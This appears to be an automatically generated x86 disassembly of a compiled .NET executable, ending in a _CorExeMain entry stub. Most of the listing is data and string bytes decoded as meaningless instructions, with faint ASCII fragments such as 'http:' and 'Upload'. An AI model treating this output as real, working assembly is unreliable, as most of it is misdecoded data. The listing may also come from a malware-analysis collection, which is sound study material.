add eax 0x82120000
xchg ebp eax
add eax 0x82120000
lds eax [ 0xffffffff82120020 ]
xchg ebp eax
add eax 0x82110020
leave
pop es
adc eax 0x1018212
adc ah [ ebp + 0x9 ]
and [ eax ] al
adc eax 0x1b98211
adc eax [ eax ]
pop es
adc eax 0x1b98211
adc ah [ ebp + 0x6 ]
and [ ecx ] al
adc al [ edx + 0x1d020ea9 ]
sbb al 0x34
pop es
sbb eax 0xac811208
sbb al 0x12
insd
push cs
add cl [ esi ]
adc al [ ebp + 0xe ]
adc al [ eax - 0x667ded33 ]
or [ eax ] cl
or [ eax ] cl
sbb al 0x12
sbb [ edx + edx ] 0x82
sbb al 0x1d
add ebx [ 0x1c1d080e ]
or [ eax ] cl
adc al [ edx - 0x367eede4 ]
adc al [ ecx + 0x508089d ]
and [ ecx ] al
sbb eax 0x7021c
add ecx [ esi ]
adc ch [ ebp + 0x1c ]
push cs
add al 0x20
add [ eax ] ecx
or [ esi ] al
and [ ecx ] al
adc al [ edx + 0x20040899 ]
add [ eax + ecx ] ebx
sbb al [ edi ]
or al 0x1d
adc al [ edx - 0x567ded57 ]
add dl [ edx ]
inc ebp
sbb eax 0x8a98212
sbb eax 0x8212081c
sbb al 0x8
or [ eax ] cl
or [ eax ] esp
add [ 0x11a98212 ] ebx
adc cl 0x14
pop es
or [ 0x8651205 ] ebx
adc al [ edx + 0x65821261 ]
adc al [ ecx + 0x2651298 ]
or [ esi ] al
and [ ecx ] al
add [ edx ] edx
xor [ esp + ecx - 0x7eedfbf9 ] 0xb48112b4
adc al [ ecx + 0xa0508b4 ]
add [ edx ] edx
xor [ esp + ecx - 0x7eedfbf9 ] 0x71811271
adc al [ ecx + 0xa050871 ]
add [ edx ] edx
xor [ ecx + 0xf ] 0x82120607
aad 0x1d
add eax 0x1d258112
add eax 0xf086512
add [ edx + edx ] al
and [ 0xffffffffd982110e ] 0x11dd8211
and cl 0x4
push es
adc [ ecx + 0x5a4 ] eax
adc [ ecx + 0x805a8 ] eax
adc [ ecx + 0x120603a8 ] eax
insd
add al [ esi ]
sbb al 0x5
and [ edx ] al
add [ edx + eax ] ebx
pop es
and [ ebx ] al
add [ edx + edx ] ebx
insd
add al [ eax + ebp ]
add [ edx ] dl
pop es
and [ edx ] al
add [ edx + edx ] ebx
xor [ eax + 0x1204200d ] 0x121c8582
xor [ eax + 0x1c898212 ] 0x81120604
pushfd
or [ eax ] ah
add al [ ecx ]
adc al [ ecx + 0x365129c ]
push es
adc bh [ ebp + 0x4 ]
and [ eax ] al
adc bh [ ebp + 0x5 ]
and [ ecx ] al
add [ edx ] edx
jge r-xdata
or [ eax ] al
adc al [ edx + 0x207088d ]
adc al [ edx - 0x727ded73 ]
push es
add [ ecx ] al
add [ edx ] edx
or [ ebp + 0x12000805 ] 0x82
jge r-xdata
adc al [ edx + 0x1206048d ]
xor al 0x8
add [ ecx ] al
cmp [ ebp + 0x8 ] 0x5
add [ edx ] al
add bl [ esp + ebx ]
add eax 0x81120020
or [ 0xffffffff82120000 ] eax
lea ecx [ eax ]
pop es
add dl [ edx ]
or [ ebp + 0x68d8212 ] 0x0
add [ ecx ] eax
adc al [ edx + 0x8058d ]
adc al [ edx + 0x8057d ]
add eax 0xe010220
and [ edx ] al
add [ edx ] edx
jge r-xdata
or eax 0x82120420
test [ edx + edx ] ebx
or esp 0x1c898212
add al 0x6
adc [ ecx + 0x2005d0 ] eax
adc [ ecx + 0x12006d0 ] eax
add [ ecx ] edx
adc eax 0x1022007
adc [ ecx + 0x20080ed0 ] eax
add eax [ ecx ]
adc [ ecx + 0x50e0ed0 ] eax
sub [ eax ] al
adc [ ecx + 0x1d0603d0 ] eax
sbb al 0x9
and [ edx ] al
add [ edx ] edx
and ch 0x11
sub cl 0x7
pop es
add eax 0x80e0808
or [ edi ] al
and [ ebx ] al
add [ esi ] ecx
sbb al 0x12
insd
push es
and [ edx ] al
sbb al 0xe
adc ch [ ebp + 0x8 ]
and [ ecx + eax ] al
or [ 0xa08081c ] bl
and [ ebx ] al
adc al [ edx - 0x7dedf17b ]
mov [ eax + 0x12010120 ] ebx
dec ebp
add eax [ esi ]
adc dl [ ecx + 0x4 ]
push es
adc al [ edx + 0x120604f1 ]
cmp [ ecx + 0x40c0602 ] 0x0
add [ eax ] ecx
or al 0x5
and [ edx ] al
add [ esp + ecx ] ecx
push es
and [ ecx ] al
add [ edx ] edx
xor ch 0xf
and [ ecx + eax ] al
adc al [ edx + 0x198111f1 ]
adc [ ecx + 0x51821119 ] eax
pop es
and [ edx ] al
add [ ecx ] edx
cmp ch 0x2
add al 0x6
adc al [ ecx + 0x1206040d ]
add [ 0xffffffff81110604 ] 0x2005f0
adc [ ecx + 0x12006f0 ] eax
add [ ecx ] edx
xor eax 0x11020706
xor eax 0x200508
adc al [ edx + 0x12006f1 ]
add [ edx ] edx
xor cl 0x1b
pop es
or [ ecx ] edx
sbb [ ecx ] 0x116d8111
sub [ ebp + 0x11 ] 0x81116d81
insd
adc [ ecx + 0x6d81116d ] eax
adc [ ecx + 0x2009086d ] eax
add al [ ecx ]
adc al [ ecx + 0x1981110d ]
add eax 0x83120000
add eax 0x11002005
sub [ ebp + 0xa ] 0x12010520
add [ 0x8080808 ] 0x9
and [ edx ] al
add [ edx ] edx
adc [ ecx ] 0x54d8211
sub [ eax ] al
adc [ ecx + 0x2805f0 ] eax
adc al [ edx + 0x120604f1 ]
or [ ecx ] 0x4
push es
adc al [ ebx + 0x207060d ]
sbb eax 0x6085512
and [ edx ] al
add [ edx ] edx
push ebp
push cs
push es
and [ ecx ] al
add [ ecx ] edx
adc [ ecx ] 0x6
and [ ecx ] al
add [ 0x20065512 ] ebx
add [ ecx ] eax
adc [ ecx + 0x7201019 ] eax
add [ edx ] edx
xor cl 0x11
sbb [ ecx ] 0x8080808
adc [ edx + 0x12060451 ] eax
cmp esp 0x1012006
adc al [ ecx + 0x12006b8 ]
add [ edx ] edx
xor [ eax + 0x1012006 ] 0x5c48112
add [ eax ] al
adc al [ ecx + 0x5070afc ]
adc ch [ ebp + 0x1d ]
adc ch [ ebp + 0x8 ]
or [ eax ] cl
push es
add [ edx ] al
sbb al 0x12
insd
add al [ 0x121d0020 ]
insd
pop es
and [ edx ] al
add [ edx + edx ] ebx
adc [ 0x12030707 ] 0x65
adc ch [ ebp + 0x8 ]
pop es
and [ edx ] al
add [ edx + edx ] ebx
sbb [ ecx ] 0x5
and [ ecx ] al
add dl [ edx ]
jge r-xdata
and [ edx ] al
add [ edx + edx ] ebx
or esp 0x1204200d
add [ ebp - 0x337eede4 ] 0x12
or [ ecx + 0x1106041c ] 0x81
rol [ 0xffffffff81110020 ] 0x1
rol [ esi ] 0x1
and [ ecx ] al
add al [ eax + ebp ]
add [ edx ] dl
jge r-xdata
add al [ ecx ]
push cs
pop es
and [ ebx ] al
add [ edx ] edx
add al [ gs : edx ]
sbb [ edi ] eax
or al 0x12
insd
add dl [ edx ]
sbb [ edx + edx + 0x6512b881 ] 0xe098112
sbb al 0x1d
adc al [ ecx + 0x8080809 ]
push es
and [ ecx ] al
adc al [ ebx + 0x20050e1d ]
add [ edx ] dl
and [ ecx ] 0x6
and [ edx ] al
sbb al 0x1c
sbb eax 0x220091c
adc al [ ebx + 0x121d0e21 ]
insd
add eax 0x81120008
cld
pop es
and [ edx ] al
sbb eax 0x1c1d0e1c
or [ eax ] ah
add [ edx ] edx
sub [ ecx ] 0x12
sub [ 0x12030709 ] 0xffffff83
sub [ edx ] edx
xor [ ecx ] 0x8
add eax 0x83120020
xor eax 0xe052009
push cs
sbb eax 0xe0e0e05
add al 0x6
adc [ edx + 0x514 ] eax
adc [ edx + 0x2070614 ] eax
adc [ edx + 0x8050218 ] eax
add [ ecx ] dl
adc [ ebx + eax ] 0x17
add [ eax + 0x1022007 ] 0x12
sbb [ ecx + 0x1106040e ] 0x6042482
adc [ edx + 0x12060428 ] eax
cmp [ eax - 0x7fedf9fc ] 0x120604ad
cmp [ 0xffffffff81120604 ] 0x69
add al 0x6
adc al [ edx + 0x12060445 ]
cmp eax 0x81120604
call 0xffffffff81549469
in al dx
add al 0x6
adc al [ ebx + 0x12060439 ]
add [ ecx + 0x4 ] 0x6
adc al [ ecx + 0x120604e4 ]
xor esp 0x1022009
adc al [ ecx - 0x477eed04 ]
adc al 0x7
or [ edx ] dl
push ebp
adc dl [ ebp + 0x12 ]
or ecx 0x12c98112
sbb [ ebp + 0x89d8112 ] 0x200508
adc [ ecx + 0x11060465 ] eax
and [ ebp + 0x8 ] 0x121c0220
add [ ecx + 0x20061c1d ] 0x1
add [ edx ] edx
add [ ecx + 0x9 ] 0x7
add edx [ edx ]
sub [ ecx + 0x11 ] 0x508d081
and [ eax ] al
adc [ ebx + 0x6070a45 ] eax
push cs
push cs
adc al [ ecx + 0x80e0eb8 ]
push es
pop es
add dl [ edx ]
or [ ecx + 0x8 ] 0x8
and [ ecx ] al
adc [ ecx + 0x558312a1 ] eax
add al 0x6
adc al [ ecx + 0x12006c4 ]
add [ edx ] edx
or [ 0x1205070d ] 0x11089982
sub [ ebp + 0x11 ] 0xc086d81
pop es
push es
push cs
adc [ edx - 0x5a7dee5b ] eax
push cs
push cs
or [ 0xffffffff82120107 ] al
xor al 0x5
pop es
add [ edx ] edx
sub [ eax + ecx ] 0x1
add [ ecx ] al
add [ eax ] al
add [ eax ] al
add [ esi ] al
and [ ecx ] al
add [ ecx ] edx
sbb [ ebp + 0x17 ] 0x1
add [ edx ] cl
dec ebp
jns r-xdata
pop es
add dl [ edx ]
add esp 0x3200708
jae r-xdata
insd
jo r-xdata
add [ ecx + 0x1 ] ah
add [ ebx + edx * 2 ] dh
jb r-xdata
popad
je r-xdata
push edx
jae r-xdata
je r-xdata
push ebx
je r-xdata
jae r-xdata
pop es
cmp [ esi ] ch
xor [ esi ] ch
xor [ esi ] ch
xor [ eax ] al
add [ eax ] dl
add [ eax ] eax
or ecx [ ebp + 0x79 ]
inc ebx
outsd
insd
jo r-xdata
push ebx
jne r-xdata
add [ eax ] al
insd
push edi
bound ebp [ gs : esi ]
push ebx
jb r-xdata
inc edi
outsd
outsb
insb
jns r-xdata
je r-xdata
arpl [ edi + 0x6c ] bp
jae r-xdata
outsb
arpl [ ebp + 0x5f ] sp
pop edi
adc eax [ ecx + ebp * 2 + 0x73 ]
jo r-xdata
push eax
popad
je r-xdata
je r-xdata
cdq
imul ebp [ esi + 0x67 ] 0x6e695373
insb
inc esi
imul ebp [ ebp + 0x47 ] 0x72656e65
popad
outsb
jae r-xdata
arpl [ ebp + 0x73 ] sp
push esp
outsd
outsd
insb
jb r-xdata
insd
jae r-xdata
imul esp [ ebx + 0x65 ] 0x72502e73
outsd
or [ ecx ] al
add [ edi ] ch
je r-xdata
je r-xdata
imul esp [ edi + 0x6e ] 0x532e7265
jns r-xdata
outsd
push ebx
arpl [ edx + 0x6f ] si
jae r-xdata
jae r-xdata
jb r-xdata
pop edi
pop edi
dec ecx
outsb
jae r-xdata
outsb
je r-xdata
jb r-xdata
jno r-xdata
add [ ecx + 0x55 ] dh
add [ eax ] al
or [ ecx ] al
add [ edi + 0x15 ] bl
add [ eax ] al
add [ eax ] al
or [ ecx ] al
add [ esp + eax ] bl
add [ eax ] al
add [ eax ] al
jbe r-xdata
jb r-xdata
jb r-xdata
outsb
imul ebp [ esi + 0x67 ] 0x6946656c
insb
inc edi
add [ ecx + 0x1 ] bl
add [ ebx + 0x4d ] cl
push ebx
je r-xdata
push edx
jae r-xdata
imul esp [ ebx + 0x72 ] 0x666f736f
je r-xdata
add [ eax ] al
pop ecx
add [ eax ] eax
dec ebx
dec ebp
pop edi
pop edi
dec ecx
outsb
jae r-xdata
add [ eax + 0x1 ] al
add [ ebx ] dh
push ebx
jns r-xdata
je r-xdata
insd
je r-xdata
je r-xdata
add [ eax ] al
or [ ecx ] al
add [ edx ] al
add [ eax ] al
add [ eax ] al
xor al 0x2e
popad
jb r-xdata
add [ ebx ] dl
add [ eax ] eax
push cs
dec ebp
jns r-xdata
outsb
jae r-xdata
arpl [ eax + 0x65 ] bp
arpl [ ebx + 0x62 ] bp
and [ ebx + 0x68 ] dl
add [ eax ] al
adc [ ecx ] al
add [ ebx ] cl
dec ebp
jns r-xdata
xor [ eax ] esi
popad
sub al 0x20
je r-xdata
push ebx
push esi
imul esi [ ebx + 0x75 ] 0x74536c61
jne r-xdata
push ebx
push 0x6f43776f
imul ebp [ esi + 0x67 ] 0x31000073
add [ eax ] eax
adc bh [ edi ]
outsb
jb r-xdata
xor [ esi ] ch
xor [ eax ] al
xor [ esi ] ch
xor [ esi ] ch
jne r-xdata
insb
push ebx
je r-xdata
popad
outsb
arpl [ ebp + 0x5f ] sp
pop edi
add [ eax ] al
add [ edi ] al
and [ ecx + eax ] al
push cs
push cs
push cs
push cs
add eax 0x1
outsb
jb r-xdata
je r-xdata
jb r-xdata
jo r-xdata
push 0x626b6365
outsd
js r-xdata
outsd
add [ eax ] eax
push esp
push cs
add al 0x54
jns r-xdata
xor [ esi ] ch
xor [ esi ] ch
xor [ eax ] al
add [ eax ] cl
add [ eax ] eax
add al [ eax ]
add [ eax ] al
imul ebp [ esp + 0x65 ] 0x2e340772
je r-xdata
jns r-xdata
popad
inc ecx
jo r-xdata
or [ ecx ] eax
add [ ebx + eax * 2 ] al
je r-xdata
imul ebp [ esi + 0x53 ] 0x69767265
adc [ edi + ebp * 2 + 0x67 ] cl
add [ eax ] al
and [ eax + 0x61 ] ch
outsb
je r-xdata
outsd
jb r-xdata
push ebx
bound esi [ ebp + 0x69 ]
insb
jb r-xdata
je r-xdata
and [ eax + ebp * 2 + 0x69 ] dh
jae r-xdata
and [ fs : ebp + 0x65 ] ch
je r-xdata
imul ebp [ edi + 0x2e ] 0x74696445
outsd
add [ gs : eax ] al
pushad
add [ eax ] al
add [ eax ] al
add [ ecx ] cl
add [ eax ] eax
add al 0x43
outsb
jne r-xdata
outsd
ja r-xdata
and [ gs : ebx + 0x68 ] dl
je r-xdata
add [ eax ] dl
add [ eax ] eax
or ecx [ ebp + 0x79 ]
push ebx
xor [ cs : eax ] al
arpl [ ebp + 0x42 ] sp
outsb
outsd
jb r-xdata
imul ebp [ fs : edi + 0x2e ] 0x74696445
je r-xdata
insd
jb r-xdata
outsb
jne r-xdata
inc edx
insb
imul esp [ ebp + 0x6e ] 0x6f725074
jae r-xdata
popad
jae r-xdata
imul ebp [ esi + 0x73 ] 0x64616574
sub al 0x20
adc bh [ gs : edi ]
outsb
arpl [ edi + 0x6c ] bp
adc al [ ebx + 0x72 ]
insb
imul esp [ ebx + 0x61 ] 0x6e6f6974
add [ eax ] al
or al 0x1
add [ edi ] al
dec ebp
jns r-xdata
ja r-xdata
push cs
or [ esi + 0x61 ] ecx
insd
jae r-xdata
popad
and [ ebx + 0x68 ] dh
outsd
ja r-xdata
arpl [ eax + 0x6f ] bp
jae r-xdata
or [ ecx ] al
bound ebp [ edi + 0x78 ]
add [ cs : eax ] al
and [ esi + 0x6f ] ch
je r-xdata
push 0x63207361
push 0x6e65736f
add [ ecx ] edx
xor [ ecx + 0x2000164 ] 0x0
push esp
push cs
add al 0x4e
popad
insd
adc [ gs : edi + ebp * 2 + 0x67 ] cl
imul esi [ ebx + 0x20 ] 0x6e207369
jb r-xdata
imul esi [ ebx + 0x20 ] 0x20776f6e
outsd
ja r-xdata
outsb
add [ eax ] al
add [ eax ] al
or [ ecx ] al
add bh bh
pop ds
add [ eax ] al
outsd
je r-xdata
and [ ebp + 0x65 ] ch
push ebx
add [ eax ] ah
add [ eax ] al
add [ eax ] al
inc ebx
inc ebx
and [ fs : ebp + 0x65 ] ch
xor [ cs : esi ] ch
insb
or [ ecx ] al
add [ eax + eax ] ch
add [ eax ] al
add [ esi ] al
and [ ecx ] al
add [ ecx ] edx
sbb [ ecx + 0x6f000108 ] 0x0
imul ebp [ esi + 0x67 ] 0x73654473
arpl [ ebp + 0x53 ] sp
outsd
popad
jo r-xdata
dec esp
outsd
imul ebp [ bp + 0x53 ] 0x69767265
jae r-xdata
and [ edi + 0x68 ] dh
outsb
and [ eax + ebp * 2 + 0x65 ] dh
and [ edx + 0x75 ] ah
imul ebp [ esp + 0x65 ] 0x61682072
arpl [ ebp + 0x73 ] sp
push eax
push ebp
jae r-xdata
outsb
das
jae r-xdata
popad
push edx
jo r-xdata
popad
arpl [ ebp + 0x3b ] sp
push 0x3a707474
das
add [ eax ] al
pushad
add [ eax ] eax
add al [ eax ]
push esp
push cs
add al 0x4e
popad
insd
adc al 0x52
jo r-xdata
insd
bound ebp [ ecx + edi * 2 + 0x2e ]
arpl [ edi + 0x6d ] bp
das
ja r-xdata
add eax 0x10001
add [ esi ] al
and [ ecx ] al
add [ eax ] al
je r-xdata
cmp ebp [ gs : eax + 0x74 ]
je r-xdata
popad
insb
jae r-xdata
outsb
push ebx
jb r-xdata
and [ esi + 0x61 ] ah
insb
jae r-xdata
jb r-xdata
insd
jb r-xdata
jo r-xdata
popad
jb r-xdata
jo r-xdata
jb r-xdata
jbe r-xdata
ja r-xdata
insd
jb r-xdata
push edx
dec esp
bound esi [ ebx + 0x65 ]
jb r-xdata
jae r-xdata
outsd
js r-xdata
and [ gs : ebx + 0x68 ] ah
arpl [ gs : ebx + 0x62 ] bp
dec esp
outsd
imul ebp [ bp + 0x2f ] 0x53746547
das
ja r-xdata
cmp ch [ edi ]
jbe r-xdata
imul esp [ ebx + 0x65 ] 0x70616f53
push esp
add [ ebx ] dl
add [ eax ] eax
push cs
dec ebp
jns r-xdata
popad
bound esi [ ebx + 0x65 ]
jb r-xdata
r-xdata
jb r-xdata
ja r-xdata
das
das
ja r-xdata
popad
jb r-xdata
popad
jae r-xdata
out dx eax
mov esi 0x1
xchg ecx eax
jb r-xdata
das
inc ebp
add [ eax ] eax
das
jb r-xdata
outsb
das
dec esp
add [ eax ] eax
inc edi
jae r-xdata
outsd
bound esi [ ebx + 0x65 ]
jb r-xdata
imul ebp [ esi + 0x67 ] 0x76726553
je r-xdata
imul esp [ ebx + 0x65 ] 0x70552f73
insb
outsd
popad
push edx
jo r-xdata
jns r-xdata
arpl [ ebp + 0x73 ] sp
das
push ebp
jo r-xdata
outsd
popad
jo r-xdata
push ebx
push edi
bound edx [ gs : ebx + 0x65 ]
jb r-xdata
imul esp [ ebx + 0x4b ] 0x6f547965
or al 0x62
popad
jae r-xdata
into
0xbeef
imul esp [ ebx + 0x65 ] 0x65522f73
outsd
popad
jb r-xdata
jbe r-xdata
push edx
or [ ecx + 0x74 ] al
ja r-xdata
popad
je r-xdata
insd
bound ebp [ ecx + edi * 2 + 0x2e ]
arpl [ edi + 0x6d ] bp
das
ja r-xdata
jne r-xdata
insd
push edx
jae r-xdata
add [ eax ] al
add [ ebx + edx * 2 + 0x79 ] ch
jae r-xdata
inc eax
push 0x3a707474
das
imul ebp [ esi + 0x67 ] 0x1452f
jae r-xdata
push edx
ja r-xdata
inc edi
je r-xdata
popad
jb r-xdata
jne r-xdata
arpl [ ebp + 0x52 ] sp
and [ esi + 0x65 ] dl
jb r-xdata
imul esp [ ebx + 0x65 ] 0x65522f73
insb
popad
arpl [ ebp + 0x33 ] sp
push 0x3a707474
das
ja r-xdata
arpl [ cs : edi + 0x6d ] bp
outsb
push ebx
jb r-xdata
imul esp [ ebx + 0x65 ] 0x70616f53
jb r-xdata
popad
jae r-xdata
das
ja r-xdata
arpl [ edi + 0x6d ] bp
jb r-xdata
outsd
inc eax
add [ eax ] eax
xor edx [ ebx + 0x79 ]
jae r-xdata
add [ eax ] eax
xor al 0x53
imul esp [ ebx + 0x65 ] 0x61000073
adc edx 0x40
lea eax [ esi + esi ]
je r-xdata
and [ eax + 0x75 ] dl
bound ebp [ ecx + ebp * 2 + 0x63 ]
dec ebx
jns r-xdata
xor al 0x42
imul ebp [ esi + 0x61 ] 0xb47972
add [ eax ] al
jne r-xdata
arpl [ ebp + 0x73 ] sp
arpl [ ebp + 0x73 ] sp
das
push edx
jo r-xdata
push edx
jae r-xdata
jne r-xdata
je r-xdata
jae r-xdata
jns r-xdata
insd
bound ebp [ ecx + edi * 2 + 0x2e ]
jo r-xdata
jae r-xdata
bound esi [ ebx + 0x65 ]
jb r-xdata
pop ds
salc
dec ecx
out dx eax
arpl [ ebp + 0x73 ] sp
push edx
jne r-xdata
jo r-xdata
push edx
jae r-xdata
pop esp
arpl [ ebp + 0x53 ] sp
je r-xdata
and [ ebp + 0x73 ] ch
arpl [ edi + 0x72 ] bp
insb
imul esp [ edx + 0x2c ] 0x72655620
jae r-xdata
push eax
mov ah 0x0
add [ eax ] al
lodsb [ esi ]
imul ebp [ edi + 0x6e ] 0x302e323d
xor [ cs : esi ] ch
jb r-xdata
jb r-xdata
inc ebx
jne r-xdata
jb r-xdata
jo r-xdata
push esp
push cs
or [ esi + 0x61 ] ecx
insd
jae r-xdata
push 0x3a707474
das
das
ja r-xdata
dec esp
outsd
imul ebp [ bp + 0x2f ] 0x4700014c
jb r-xdata
insd
bound ebp [ ecx + edi * 2 + 0x2e ]
arpl [ edi + 0x6d ] bp
push esi
jno r-xdata
pushad
cmp eax 0xd66eb08d
pop eax
dec ebx
adc [ esp + eax * 2 ] 0x5
in eax dx
push ecx
stosb [ edi ]
xor ecx [ esi - 0x2b2f5166 ]
xchg ebp eax
mov dh 0x79
pop edx
inc ecx
shr [ ecx - 0x6f ] 0x1
0xda848c37 0x3bc7
adc al 0xaf
adc al 0xa0
rol cl 0xcf
enter 0x21e6 0x59
dec eax
add eax 0xfa311375
jo r-xdata
insd
push edx
jae r-xdata
jpo r-xdata
imul esp [ ebp + 0x6e ] 0x3d
bound esi [ edi ]
aaa
outsd
je r-xdata
or [ ebp + 0x5c ] ebp
and [ ecx + 0x48 ] ebx
das
ja r-xdata
cmp ch [ edi ]
add [ eax ] eax
add [ eax ] eax
push esp
push cs
imul esp [ ebx + 0x65 ] 0x70552f73
insb
das
aas
pop ebp
cmp bl [ esi ]
pop es
inc esi
lodsb [ esi ]
fwait
push ds
and dl al
loopne r-xdata
cmpsd [ esi ] [ edi ]
push ds
fmul [ edx + 0x20 ]
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax ] al
add [ eax + 0x41 ] dl
inc esp
push eax
inc ecx
inc esp
xor [ eax ] ch
outsd
outsb
cmp eax 0x2e302e32
dec esp
or [ edx - 0x3731c1a4 ] cl
or eax 0x1ef4f2cb
add al 0x4c
insb
pop ebx
and [ esi + 0x2e24be30 ] eax
mov al 0xef
sub ecx ecx
inc ecx
jecxz r-xdata
jge r-xdata
je r-xdata
xor [ esi ] ch
xor ch [ esi ]
xor [ esi ] ch
outsd
popad
push edx
imul ebp [ esi + 0x67 ] 0x6c70552f
cmp eax 0x7475656e
jb r-xdata
xor al [ eax ]
add [ ecx + eax ] bl
add [ ecx ] al
add [ esi + ecx + 0x8 ] dl
inc esp
popad
je r-xdata
jae r-xdata
popad
jb r-xdata
push edx
push esp
rcr edx 0x1
add al 0x86
idiv [ ebx - 0x10b62992 ]
add al 0x36
insd
inc edx
mov dl 0x98
sub dh [ ecx - 0x650539b4 ]

xor [ ecx ] eax
sub [ edi + edi - 0x3e ] 0xac
inc esp
and [ 0x665f7363 ] ah
cld
inc ebx
loop r-xdata
pop ebx
xor bh ah
xor al al
jb r-xdata
insb
sub al 0x20
push eax
jne r-xdata
push esp
jpe r-xdata
push edx
je r-xdata
inc edx
0x72c13009 0xc8a0
xor al al
int1
add [ eax ] eax
insb
into
enter 0xcb0d 0xf2
hlt
add bl [ ebx + 0x32 ]
xor cl al
jb r-xdata
popad
popad
xor eax 0x31363563
cmp [ ebx ] esi
xor al 0x65
xor [ eax ] bh
cmp [ ebx ] esp
push ebx
jns r-xdata
enter 0xd13a 0x32
push ss
mov dh 0x17
adc eax 0x10105d17
xchg ecx eax
dec edi
or [ ebp + 0x7a ] dl
cmp esi [ esi + eax * 4 - 0x55 ]
scasb [ edi ]
scasd [ edi ]
rol [ 0xfffffffffa311375 ] 0x70
mov eax [ 0x4dad154 ]
xchg [ ebx + 0x48d40d2 ] al
idiv [ ss : ebx - 0x10b62992 ]
sub_4024b6
dec [ eax + eax ]
add [ eax ] al
iretd
sub_4024cd
jmp [ esi ]
sub_406669
[ edx - 0x2 ]
sub_40667d
jmp ebp
sub_40967e
jmp [ eax ]
sub_409ef5
push es
add [ eax ] al
add [ eax ] bh
0x1
sub_40a0ba
jmp [ eax ]
sub_40b989
push ss
adc eax [ esi ]
and [ ecx ] al
add [ eax ] al
add [ eax ] ch
0x39060000 0xfecf
sub_40b99a
jmp [ esi ]
sub_40dd68
push [ eax + 0x6fffff5 ]
hlt
sub_411ebd
jmp [ ebp ]
sub_413942
jmp [ eax ]
sub_4143ab
test [ eax ] 0x6f070000
jle r-xdata
or bh [ ecx ]
adc [ eax ] al
add [ eax ] al
pop es
outsd

add [ edx ] cl
cmp [ eax ] edx
add [ eax ] al
add [ edi ] al
sub_414458
[ edi ]
sub_4144b0
jmp [ eax ]
sub_414853
jmp [ eax ]
sub_418a30
jmp [ eax ]
sub_418af0
jmp [ eax ]
sub_41ed69
shld [ edi ] ecx cl
sbb dl [ eax ]
xor [ eax ] edx
jge r-xdata
retn 0xd711
retn 0xed10
sub_41f00d
adc eax 0x1ac0010
add al [ eax ]
or [ eax ] al
stosd [ edi ]
add [ edx ] eax
add [ edx ] al
add [ 0x8000300 ] al
add cl cl
add [ eax + eax ] eax
adc [ eax ] al
0x401
sub_41f16b
add dl ch
add [ ecx ] esp
add al [ eax ]
jmp sub_41f175
sub_41f3c3
cmpsb [ esi ] [ edi ]
add al 0x0

_CorExeMain
jmp [ _CorExeMain@IAT ]
